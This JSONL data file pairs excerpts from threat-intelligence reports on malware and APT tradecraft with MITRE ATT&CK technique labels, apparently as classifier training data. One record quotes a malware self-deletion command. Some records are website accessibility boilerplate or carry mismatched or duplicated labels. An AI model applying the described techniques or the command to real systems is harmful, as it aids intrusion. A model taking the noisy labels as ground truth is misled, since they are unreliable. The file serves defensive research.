{"text1":"The encryption style does not differ significantly from other prominent ransomware families. WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives. Once the eligible drives are located, the ransomware will begin the encryption process","labels":"['T1120']"}
{"text1":"It implements a simple custom-built virtual machine mechanism that will execute an embedded bytecode to decode and inject the payload into memory","labels":"['T1027.002']"}
{"text1":"The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class","labels":"['T1140']"}
{"text1":"Tonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia, Japan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT groups that now has access to the ShadowPad backdoor","labels":"['T1059.001', 'T1505.003', 'T1105']"}
{"text1":"The Bazar loader files are dual-extension executable files (such as PreviewReport.DOC.exe) signed with fake certificates such as VB CORPORATE PTY. This is consistent with the Trickbot group, which notoriously abuses the trust of certificate authorities by using signed loaders and malware to evade security product detection","labels":"['T1036.007']"}
{"text1":"To operate and evade standard analysis tools, most of the functions are hashed. The hashing algorithm has a high degree of similarity to the previous ShellTea version, with a slight modification of the seeds and constants. In this version, the attacker also utilizes functions from ole32 for stream processing","labels":"['T1027']"}
{"text1":"While the URI string has changed from Trickbot and Anchor variants, the phishing tactics and use of post-infection reconnaissance commands remains the same. In the Bazar backdoor, the tag (or gtag) used to identify Trickbot campaigns is removed from C2 URIs. It may have been moved to the cookie HTTP header parameter","labels":"['T1071.001']"}
{"text1":"Later in the execution chain, the SeLoadDriverPrivilege is used to load the extracted driver. Then one of the four drivers is dropped, after which the Volume Shadow Copy (VSS) service \u2013 which allows backups to be performed \u2013 is stopped","labels":"['T1490']"}
{"text1":"In addition to loading the communications module, the initial macro described above configures a persistence mechanism for this malware loader by setting up\u202fa\u202fRegistry\u202fRun key. The non-concatenated command included in the macro that establishes persistence for Libcurl.dll and the hash for this sample are included below","labels":"['T1547.001']"}
{"text1":"As part of the exploitation process, the above value will be written to the registry under the %windir% variable, and deleted after execution","labels":"['T1112']"}
{"text1":"The document contains an encoded Visual Basic Script (VBScript) typical of previous Carbanak malware. Recent samples of the malware\u00a0have now included\u00a0the ability to use Google services for command-and-control (C&C) communication. The module is base64 encoded inside the main VBScript file along with various other VBScript modules used by the malware. When we analyzed the script we noticed that it is capable of using Google services as a C&C channel. Abusing Google for C&C communication . The \"ggldr\" script will send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services. It is unlikely that these hosted Google services are blocked by default in an organization, so it is more likely that the attacker will establish a C&C channel successfully. Upon the first attempt to contact the hard-coded Google Apps Script URL with the user's unique infection ID, the C&C will state that no spreadsheet currently exists for the user. The malware will then send two requests to another hard-coded Google Forms URL which will result in the creation of unique Google Sheets spreadsheet and Google Form IDs for the victim. The second time the Google Apps Script is requested, the C&C will return the unique Google Sheet and Google Form ID values: The \"entry\" value is also a unique ID which is sent with each subsequent Google Forms C&C request. Using Google as an independent C&C channel is likely to be more successful than using newly created domains or domains with no reputation","labels":"['T1102.002']"}
{"text1":"Operation North Star C2 infrastructure consisted of compromised domains in Italy and other countries. Compromised domains belonged, for example, to an apparel company, an auction house and printing company. These URLs hosted malicious DOTM files, including a malicious ASP page","labels":"['T1608.001']"}
{"text1":"The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for jmttrading[.]org (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002","labels":"['T1588.004']"}
{"text1":"These platforms are used to exfiltrate documents and receive instructions. Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are hardcoded within the sample","labels":"['T1102.002']"}
{"text1":"Taken together, the VirusTotal submissions of the samples, the samples themselves, the ZIP containing the samples (observed as a dissemination mechanism via email attachment), as well as the RAR container (seen later in this report under the Analysis section) form a timeline beginning on 12 November","labels":"['T1566.001']"}
{"text1":"HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives","labels":"['T1059.003']"}
{"text1":"The malware proceeds to check to see if the original dropped malware file exists. In the event it does, Reaver will move this file to \u2018%TEMP%\\~FJIOW.tmp\u2019 and delete this new file. This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine. Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges. Reaver continues to collect various information from the victim machine, including the following","labels":"['T1070.004']"}
{"text1":"The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California","labels":"['T1553.002', 'T1553.002']"}
{"text1":"The two-stage malware overwrites the Master Boot Record (MBR) on victim systems with a ransom note (Stage 1). The MBR is the part of a hard drive that tells the computer how to load its operating system","labels":"['T1561.002']"}
{"text1":"Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware\u2019s behavior","labels":"['T1053.005']"}
{"text1":"The Distributed Transaction Coordinator (DTC) service coordinates transactions that update two or more transaction-protected resources, such as databases, message queues, files systems, and so on. These transaction-protected resources may be on a single computer or distributed across many networked computers","labels":"['T1036.005', 'T1036.005', 'T1036.005']"}
{"text1":"Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials. Seedworm uses off-the-shelf, unmodified versions of these tools as well as custom-compiled variants which we have determined are only used by this group","labels":"['T1552.001', 'T1555.003']"}
{"text1":"Initial access via a phishing email that linked to a google docs page that enticed the user to download a report, which was a Bazar Loader executable file instead Report-Review20-10.exe","labels":"['T1566.002']"}
{"text1":"Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions","labels":"['T1102']"}
{"text1":"The encrypted request includes a PC identifier and timestamp, and optionally some other data. It is worth noting that the RC2FM module uses a number of encryption methods (variations of a simple XOR encryption routine), unlike the other InvisiMole parts","labels":"['T1140']"}
{"text1":"In these cases, the temporary file is written to the %TEMP% directory, and the filename is a combination of numbers generated from a call to GetTickCount and the '.dat' extension (e.g","labels":"['T1218.011']"}
{"text1":"In the past, this APT has relied on Hangul Office documents (hwp files) to target victims, as it\u2019s software that\u2019s commonly used in South Korea. However, in this blog we describe an interesting alternative method, delivered via self-decoding VBA Office files","labels":"['T1566.001']"}
{"text1":"Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH","labels":"['T1059', 'T1046']"}
{"text1":"Snippets of HOLMIUM PowerShell backdoor (POWERTON) implementing two different persistence mechanisms: WMI event subscription (T1084) and Registry run keys or Startup folder (T1060","labels":"['T1546.003', 'T1547.001']"}
{"text1":"1) Hunting for PDF files that are created with the same \u201cDocumentID\u201d management metadata field result in a set of files that have been used in email delivery against banking entities. 2) All of the PDF files embed a link based on a Google redirect, leading to the download of a Microsoft Office document file. 3) The Microsoft Office document files contain macros for code execution. Those macros match the characteristics of the builder that we have characterized","labels":"['T1204.002', 'T1204.001']"}
{"text1":"The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA).\u00a0The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe","labels":"['T1218.005', 'T1204.002']"}
{"text1":"The two dropped artifacts \u2013 a payload DLL and a Word document \u2013 are written to the \u201cUsers\\<Log on User>\\\u201d folder (the document will replace the opened malicious document with clean stub after killing the running Word process","labels":"['T1059.005']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. CTU researchers identified two versions of Daserf written in Visual C and Delphi. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. RarStar HTTP POST request. Use malware to upload the large list of enumerated files to the C2 server. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1573.001']"}
{"text1":"1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee\u2019s system, they gained access to the e-commerce company's internal network. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. It isn't clear why the attackers scanned for hosts with port 40 open because there isn't a common protocol assigned to this port. Based on Suckfly scanning for common ports, it\u2019s clear that the group was looking to expand its foothold on the e-commerce company's internal network. 5) The attackers\u2019 final step was to exfiltrate data off the victim\u2019s network and onto Suckfly\u2019s infrastructure","labels":"['T1046']"}
{"text1":"Step 6: After obtaining the fully privileged handle of Taskmgr.exe, the actor uses this handle to execute cmd as high privilege process to execute install.bat","labels":"['T1218.011', 'T1134.004']"}
{"text1":"The threat actors can execute remote commands by running this specialized module with predefined actions. This module attempts to execute a command. It uses the PowerShell Invoke-Expression method for the PowerShell-based module, while its C# implementation has both cmd and PowerShell options","labels":"['T1059.003']"}
{"text1":"OFF ON Vision Impaired Profile Enhances website's visuals This profile adjusts the website, so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. This website utilizes various technologies that are meant to make it as accessible as possible at all times. We utilize an accessibility interface that allows persons with specific disabilities to adjust the website\u2019s UI (user interface) and design it to their personal needs. This application remediates the website\u2019s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments. In this process, we provide screen-readers with meaningful data using the ARIA set of attributes. It will also extract texts embedded within the image using an OCR (optical character recognition) technology. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Additional UI, design, and readability adjustments . 1) Font\u00a0adjustments \u2013\u00a0users can increase and decrease its size, change its family (type), adjust the spacing,\u00a0alignment, line height,\u00a0and more. 7) Additional functions\u00a0\u2013 we allow users to change cursor color and size, use a printing mode, enable a virtual keyboard, and many other functions. Still, we are continually improving our accessibility, adding, updating, improving its options and features, and developing and adopting new technologies","labels":"['T1059.003']"}
{"text1":"In another engagement, we observed the adversary using Mimikatz (the official signed version) to access credentials for logon (T1003.001: LSASS Memory","labels":"['T1003.001']"}
{"text1":"MobileOrder starts by registering itself as device administrator so that a normal user cannot uninstall it by simply clicking \u201cuninstall\u201d in settings","labels":"['T1105']"}
{"text1":"A screen capture of Trickbot\u2019s code that is structured to steal passwords from popular web browsers . It should be noted that this Trickbot variant is not capable of stealing passwords from third-party password manager applications. Screen capture of code showing possible SMB communication . networkDll32 Trickbot uses this encrypted module to scan the network and steal relevant network information. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users. It's also used to inject code into its target processes using the Reflective DLL Injection technique. James\u2019s Place Bank, and Royal Bank of Scotland, and will redirect users to fake phishing websites. Trickbot\u2019s other notable tricks . Trickbot is usually sent via malicious spam campaigns. Defending against Trickbot\u2019s tricks: Trend Micro solutions . Malware authors continue to update banking trojans like Trickbot and Emotet with new modules that make it more difficult to detect and combat. Users can also use shortcuts such as \u201cM\u201d (menus), \u201cH\u201d (headings), \u201cF\u201d (forms), \u201cB\u201d (buttons), and \u201cG\u201d (graphics) to jump to specific elements.Note: This profile prompts automatically for keyboard users. This application remediates the website\u2019s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments. Assistive technology and browser compatibility . We aim to support as many browsers and assistive technologies as possible, so our users can choose the best fitting tools for them, with as few limitations as possible","labels":"['T1185']"}
{"text1":"It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past","labels":"['T1573.001']"}
{"text1":"NewBCtestDll, NewBCtestnDll Module that is a reverse proxy and is able to execute commands. Module that is a reverse proxy and is able to execute commands. vncDll Module used as a RAT on the victim machine. Module used as a RAT on the victim machine. vpnDll Module used to create VPN proxy routed to a given address. Module used to create VPN proxy routed to a given address. rdpscanDll Module used for brute forcing RDP on a certain list of targets. Module used for brute forcing RDP on a certain list of targets. bcClientDllTestTest An old module used to proxy Trickbot operator traffic through a victim machine. An old module used to proxy Trickbot operator traffic through a victim machine","labels":"['T1219']"}
{"text1":"While some variations exist in functionalities, the main purpose of these modules is to enumerate all documents on a compromised system and upload them to the C&C server. These file stealers can also download and execute arbitrary code from the C&C server. As with many other tools used by the Gamaredon group, they come in four different coding languages: C\/C++, C#, batch file and VBScript","labels":"['T1005']"}
{"text1":"On June 21st, 2017 an attacker breached\u00a0one of our monitored systems by brute-forcing SSH credentials using two IPs known to be part of the TOR network","labels":"['T1110']"}
{"text1":"DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets","labels":"['T1114.002', 'T1133']"}
{"text1":"While investigating these files, we observed what we believe was active development on these .cmd files that helps illuminate the Gamaredon group\u2019s processes","labels":"['T1057']"}
{"text1":"Attempt to get detailed information about the operating system and hardware, such as version, patches, hotfixes, service packs, and architecture (System Information Discovery [T1082]) - Enumerate files and directories or search in specific locations of a host or network share for particular information within a file system (File and Directory Discovery [T1083]) - Get a list of security software, configurations, defensive tools, and sensors installed on the system (Software Discovery: Security Software Discovery [T1518.001]) - Procure information about running processes on a system to understand standard software running on network systems (Process Discovery [T1057]) - Identify primary users, currently logged in users, sets of users that commonly use a system, or active or inactive users (System Owner\/User Discovery [T1033]) - Enumerate browser bookmarks to learn more about compromised hosts, reveal personal information about users, and expose details about internal network resources (Browser Bookmark Discovery [T1217]) - Look for information on network configuration and system settings on compromised systems, or perform remote system discovery (System Network Configuration Discovery [T1016]) - Interact with the Windows Registry to gather information about the system, configuration, and installed software (Query Registry [T1012]) - Get a list of open application windows to learn how the system is used or give context to data collected (Application Window Discovery [T1010]) - Attempt to get a listing of local system or domain accounts in the compromised system (Account Discovery [T1087]) - Obtain a list of network connections to and from the compromised system or remote system by querying for information over the network (System Network Connections Discovery [T1049","labels":"['T1083', 'T1518.001', 'T1033', 'T1082', 'T1217']"}
{"text1":"BRONZE UNION uses various tools for credential theft. In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt","labels":"['T1003.001']"}
{"text1":"Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s data","labels":"['T1027', 'T1560']"}
{"text1":"PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34","labels":"['T1003.005', 'T1003.004', 'T1555', 'T1552.001', 'T1003.001', 'T1555.003', 'T1555.003']"}
{"text1":"Static analysis of this executable shows only two functions, but a regular number of imports. Upon detecting a debugger attached to it, the malware will display the message below and terminate the execution. This packer also hides the calls to API functions. This time instead of using a dispatcher function, the malware pushes the arguments into the stack as usual but will then perform a call to a jump table built during the unpacking, in the .text section memory region. Each entry finishes with a jmp instruction into the respective API function. Effectively the malware doesn't do any call to API functions, it always performs a jump. The end result is the same has in the packer from 2016, but with a simpler mechanism. One of the anti-analysis features included in this packer is the lack of calls to API functions. In the early stages of execution, the malware loads the libraries and retrieves the addresses from functions it needs. Feature-wise, there is no change when compared with the 2016 version, in fact when compared the C2 beaconing functions even share some of the offsets","labels":"['T1497.003']"}
{"text1":"File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes\/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. File listing plugin: Works on local or remote drives and can map additional paths when given credentials","labels":"['T1082', 'T1083']"}
{"text1":"This function aims to download the powershell code from the command and control server and execute it","labels":"['T1105']"}
{"text1":"All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts","labels":"['T1561.002']"}
{"text1":"The \u2018vsnet\u2019 plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user\u2019s computer and network","labels":"['T1049']"}
{"text1":"In one case, the attackers sent a malicious document which was nearly identical to a legitimate attachment which we observed later being sent to the same recipient","labels":"['T1204.002']"}
{"text1":"The PlugX malware can be configured to use HTTP, DNS, raw TCP, or UDP to avoid network-based detection. In one sample analyzed by CTU researchers, PlugX was configured with hard-coded user credentials to bypass a proxy that required authentication. Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications","labels":"['T1071.001', 'T1071.004', 'T1095']"}
{"text1":"The macro in the XLS file uses PowerShell to download and execute gm.exe, which is the Warzone RAT - Gm.exe bypasses UAC to run at high integrity level - Gm.exe copies itself to %programdata% with the name Images.exe and then executes it","labels":"['T1059.001']"}
{"text1":"Those files are then uploaded via unencrypted HTTP, one after another. Examining the network packets showed that they contained a string with two pieces of information: a file path and a random string of characters","labels":"['T1071.001', 'T1041']"}
{"text1":"STOLEN INFO\u2019 message \u2013 bot message to C2 with stolen information like passwords, accounts, emails, etc. Stolen information is RC4 encrypted and Base64 encoded. The key for the RC4 encryption is generated in a different way and based on the infected system ID (aka Bot ID) values, and not based on a static string as in the case of traffic encryption","labels":"['T1132.001', 'T1573.001']"}
{"text1":"mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. To gain higher privileges mshlpweb.dll execute the Windows Update Standalone Installer, wusa.exe. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest","labels":"['T1218.011']"}
{"text1":"Once the VBScript has been decoded it reveals a rather complex set of functions. These implants are known as Torisma and Doris, both of which are base64 encoded. They are loaded directly into memory via a binary stream once conditions have been satisfied based on the logic contained within the script","labels":"['T1027']"}
{"text1":"First, the malware checks for the existence of a Mutex value, \u201cEKANS\u201d, on the victim. Otherwise, the Mutex value is set and encryption moves forward using standard encryption library functions. Primary functionality on victim systems is achieved via Windows Management Interface (WMI) calls, which begins executing encryption operations and removes Volume Shadow Copy backups on the victim","labels":"['T1047']"}
{"text1":"Before evidence of BlackEnergy2 use in targeted attacks was uncovered, we tracked strange activity on one of the BlackEnergy CnC servers in 2013. This strangeness\u00a0was related to values listed in newer\u00a0BlackEnergy configuration files. As described in Dmitry\u2019s 2010 Black DDoS\u2019 analysis, a configuration file is downloaded from the server by main.dll on an infected system. The config file provides download instructions for the loader. In this particular case in 2013, the config file included an unknown plugin set, aside from the usual \u2018ddos\u2019 plugin listing. Displayed below are these new, xml formatted plugin names \u201cweap_hwi\u201d, \u201cps\u201d, and \u201cvsnet\u201d in a BlackEnergy configuration file download from a c2 server. This new module push must have been among the first for this group, because all of the module versions were listed as \u201cversion 1\u201d, including the ddos plugin","labels":"['T1552.001']"}
{"text1":"In mid-2018, OceanLotus carried out a campaign using documents abusing the weakness exposed by the CVE-2017-11882 vulnerability. One of the malicious documents used by OceanLotus was analysed by 360 Threat Intelligence Center (in Chinese) and includes details about the exploit. Let\u2019s take a look at a similar document","labels":"['T1203']"}
{"text1":"NOBELIUM has been observed modifying Azure AD to enable long-term persistence and access to sensitive information. This can include the creation of users, consent of Azure AD applications, granting of roles to users and applications, creation of additional service principal credentials, and more. In one incident, MSTIC observed the use of Azure RunCommand, paired with Azure admin-on-behalf-of (AOBO), as a technique to gain access to virtual machines and shift access from cloud to on-premise. NOBELIUM has demonstrated an ongoing interest in targeting privileged users, including Global Administrators. NOBELIUM is frequently observed conducting activities consistent with intelligence collection","labels":"['T1087.004']"}
{"text1":"Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks","labels":"['T1136.001']"}
{"text1":"Next, REvil checks the configuration field dbg to see if it\u2019s running in debug mode. If that is not the case, geolocation checks based on the system\u2019s language and the keyboard layout are conducted so the ransomware does not attempt to encrypt files on whitelisted systems. The following are whitelisted system language IDs for the analyzed sample","labels":"['T1082']"}
{"text1":"The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails. The group is still using similar phishing models previously mentioned in the KISA report with some small changes","labels":"['T1566.001', 'T1589.002']"}
{"text1":"The export called \u201cSendDataToServer_2\u201d does exactly what the name means: it encrypts all collected data, encodes it using Base64 encoding and calls its additional library to send the data to the C2 server. The names of the C2 servers are hardcoded","labels":"['T1132.001']"}
{"text1":"The user receives a phishing email with a ZIP attachment containing an Office document with embedded macros, the document itself or a link to download malicious document. The user opens the malicious attachment\/link and is tricked into clicking \u201cEnable content\u201d. - A malicious macro is executed. One of the encrypted resources has the DLL binary (loader) which is decrypted later during runtime","labels":"['T1204.001', 'T1204.002']"}
{"text1":"Helminth relies on the following shortcut for persistence, as it runs the Trojan each time the system starts using the following command line","labels":"['T1547.001']"}
{"text1":"In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom","labels":"['T1090']"}
{"text1":"Our initial discovery of GravityRAT was through a malicious Word document. We were able to discover four distinct versions of GravityRAT, developed over two years","labels":"['T1559.002']"}
{"text1":"The use of the choice command, as seen below, did not appear in previous versions of OopsIE and appears to have been added in the most recent version used in this attack. cmd.exe \/C choice \/C Y \/N \/D Y \/T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. With the Trojan moved its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. The Trojan accesses two resources, named Sch and VBS that contains obfuscated strings that contain the command to create the scheduled task and the VBScript to run. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify and erroneous transmission from the C2, which gave OopsIE its name is reversed to spoo. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2","labels":"['T1059.005']"}
{"text1":"Waterbear employs a modular approach to its malware. It utilizes a DLL loader to decrypt and execute an RC4-encrypted payload. Sometimes, the hardcoded file paths of the encrypted payloads are not under Windows native directories (e.g. It is also possible that the attackers use Waterbear as a secondary payload to help maintain presence after gaining some levels of access to the targets\u2019 systems. The evidence is that Waterbear frequently uses internal IPs as its own C&C servers (for instance,\u00a0b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361 uses an internal IP address of\u00a010[.]0[.]0[.]211 as its C&C server","labels":"['T1027']"}
{"text1":"Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication","labels":"['T1598.002']"}
{"text1":"Sodinokibi gathers some basic system information and saves it to the registry together with the generated encryption parameters. If the dbg option is not set in the config, the UI language and keyboard layout values are checked, and the malware will simply exit on systems which use one of the following language codes","labels":"['T1112', 'T1082']"}
{"text1":"The backdoor installation sequence shows that it\u2019s meant for persistence via \/LaunchAgents\/com.aex-loop.agent.plist and \/Library\/LaunchDaemons\/com.aex-loop.agent.plist. It initiates the configuration file \/Library\/Caches\/com.applestore.db to set the C&C server IP and for remote session information. Loading the bot plugins, this enables connection to the server to open and wait for commands, update the configuration file based on the commands received, and encrypt the file via AES CBC. If the configuration file already exists, it will decrypt once a new session starts","labels":"['T1027']"}
{"text1":"Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically. Besides these, there are keyloggers, browser-focused password stealers, camera control applications, and other generic password stealers","labels":"['T1555.003']"}
{"text1":"The final payload is a ZIP archive that is usually encrypted by the algorithm shown in Figure 8 and, in a significant number of cases, we saw it being password-protected as well","labels":"['T1027', 'T1027']"}
{"text1":"In order to pull down the backdoor, a payload stager, either HTTP or reverse-DNS, is executed with the use of a scheduled task","labels":"['T1053.005']"}
{"text1":"PDB Path: C:\\Users\\803\\Desktop\\ytyboth\\yty 2.0\\Release\\vstservice.pdb The vstservice.exe plugin is .NET file responsible for sending a list of the file system to the C2. The malware retrieves the C2 from a Google Docs file like the previous binaries. The file was located at the following location","labels":"['T1005']"}
{"text1":"In one sample we analyzed, the zip file contains a VBS file named NUM_56960.vbs. The size of the file is around 30MB. The large file size helps it evade detection, as file scanners usually skip scanning huge files for performance reasons. This VBS file then downloads the malicious executable file PaintHelper.exe","labels":"['T1027.001']"}
{"text1":"The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. In this case, Cryptoguard was preventing the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive. Weaponized virtual machine . The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload. The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of XP. The virtual machine (VM) that Sophos extracted from the Maze attack shows that this (newer) VM is configured in such a way that it allows easy insertion of another ransomware on the attacker\u2019s \u2018builder\u2019 machine. But the cost in terms of size is signficant: The Ragnar Locker virtual disk was only a quarter the size of the nearly 2GB virtual disk used in the Maze attack\u2014all just to conceal one 494 KB ransomware executable from detection. The attackers also executed the following commands on the host computer during the Maze attack: This ran the Microsoft Installer that installs VirtualBox and the virtual hard drive. They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies. The Maze threat actors have proven to be adept at adopting the techniques demonstrated to be successful by other ransomware gangs, including the use of extortion as a means to extract payment from victims","labels":"['T1047']"}
{"text1":"Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. The document\u2019s metadata used in this campaign links them to several other documents used by this actor in the past","labels":"['T1027']"}
{"text1":"Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer. Analysts can easily extract detailed information from these trees, such as the implant DLL dropped by the installer, the command used to call rundll32.exe and load the DLL, and the registry modifications that set the DLL as a service","labels":"['T1543.003']"}
{"text1":"The function of this tool is to set up a TCP listener on a localhost, receive encoded data via requests from the\u202fSodomNormal\u202flocalhost module, and to forward this data to the command and control IP via HTTP. The GUP Proxy Tool has a hardcoded configuration which is included as both strings and integers","labels":"['T1036.005']"}
{"text1":"Downloaded payload is a variant of a cloud-based RAT known as RokRat which has been used by this group since 2017. This RAT is known to steal data from a victim\u2019s machine and send them to cloud services (Pcloud, Dropbox, Box, Yandex","labels":"['T1567.002']"}
{"text1":"Sandbox check and anti-virus product enumeration - Dropping payload \u2018netmgr.exe\u2019 - Creating a registry key for persistence - Creating a registry key for deletion of the dropper","labels":"['T1547.001']"}
